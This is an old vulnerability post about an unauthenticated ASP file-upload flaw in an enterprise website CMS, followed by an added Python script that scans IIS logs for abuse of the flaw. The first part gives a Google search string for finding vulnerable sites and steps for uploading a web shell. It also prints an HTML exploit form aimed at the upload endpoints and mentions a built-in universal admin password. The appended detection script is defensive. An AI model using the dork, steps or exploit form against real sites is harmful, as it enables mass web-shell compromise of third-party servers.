711 enterprise web site management program V6.0 upload vulnerability and exploit - vulnerability warning - the black bar safety net

2010-02-27T00:00:00
ID MYHACK58:62201026257
Type myhack58
Reporter Anonymous
Modified 2010-02-27T00:00:00

Description

sfmb ----------------------- The other day a Cookie injection vulnerability, and today they turned to see to

In the ADMIN directory there are 2 upload files, upfile.asp and upfile2.asp.

What these 2 components allow: without logging in to the backend and without capturing packets, modifying the form code locally is enough to upload asp files. Speechless...

In addition, and even more lovely, the author of this program wrote in a universal password for us that logs directly in to the backend. According to Google, this system has up to 1,050,000 users. Still speechless.

1. Search Google for inurl:List.asp?Shop_ID
2. If the site has the upload files above, 90 percent of the time an asp file can be uploaded.
3. Replace the address shown in images 1, 2, 3 with the address of the website you are testing.
4. In the "select a picture" field, choose the asp file to upload. Any file suffix can be uploaded.
5. Open the web site home page and look for the real address of the pictures. Generally the shell address is http://www.XXX.com/pic/XXXXXX.asp

One more remark: aren't there 2 upload components? Generally the administrator will modify or delete the first one, upfile.asp; the second one, upfile2.asp, can still be used.

If the test fails, the vulnerability has been patched. If the test fails and there is no patch, to quote a passage: "In general, when something happens to one individual as a negative phenomenon with its own unique properties, and the phenomenon cannot be given a reasonable scientific explanation yet does exist, we generally call it a character issue (RPWT)." Excerpted from the "dictionary", Section 87, Page 4.

EXP:

<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
  <link href="style.css" rel="stylesheet" type="text/css">
</head>
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF">
  <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
    <form name="myform" method="post" action="http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript">
      <tr align="center" valign="middle">
        <td height="15" align="left">
          select a picture:
          <input type="file" name="file1" value="">
          <input type="submit" value="upload" name="B1" class="txt" isshowprocessbar="True">
        </td>
      </tr>
    </form>
  </table>
</body>
</html>
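
For site owners checking whether these upload files have been used, an added example (not part of the original advisory): a Python check over IIS W3C logs that flags POSTs to upfile.asp and upfile2.asp and requests for script files under /pic/, and correlates the two by client address. The log lines, IP addresses, log field layout and extension list are constructed assumptions.

```python
import re

# Upload files named in the advisory; /pic/ is the upload directory it mentions.
UPLOAD_ENDPOINTS = {"/admin/upfile.asp", "/admin/upfile2.asp"}
UPLOAD_DIR = "/pic/"
# Assumption: extensions commonly mapped to a script handler on IIS.
SCRIPT_EXT = re.compile(r"\.(asp|asa|cer|cdx|aspx)$", re.I)

# Constructed sample log (W3C extended format, documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-02-27 10:00:01 198.51.100.7 GET /List.asp Shop_ID=3 200
2010-02-27 10:00:09 198.51.100.7 POST /admin/upfile.asp - 200
2010-02-27 10:00:15 198.51.100.7 GET /pic/20100227100009.asp - 200
2010-02-27 10:02:40 203.0.113.20 GET /pic/logo.jpg - 200
2010-02-27 10:03:02 203.0.113.21 POST /admin/upfile2.asp - 404
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_upload_abuse(text):
    """Return (alerts, ips that uploaded and then fetched a script from /pic/)."""
    alerts, uploaders, correlated = [], set(), set()
    for r in parse_w3c(text):
        path, ip = r["cs-uri-stem"].lower(), r["c-ip"]
        ok = r["sc-status"].startswith("2")
        if r["cs-method"] == "POST" and path in UPLOAD_ENDPOINTS:
            alerts.append(("upload-post", ip, path, r["sc-status"]))
            if ok:
                uploaders.add(ip)
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            alerts.append(("script-in-upload-dir", ip, path, r["sc-status"]))
            if ok and ip in uploaders:
                correlated.add(ip)
    return alerts, correlated

if __name__ == "__main__":
    print(find_upload_abuse(SAMPLE_LOG))
```

A 404 on the upload POST, as in the last sample line, means the file is already gone on that host; a correlated address means an upload succeeded and the uploaded script was then requested.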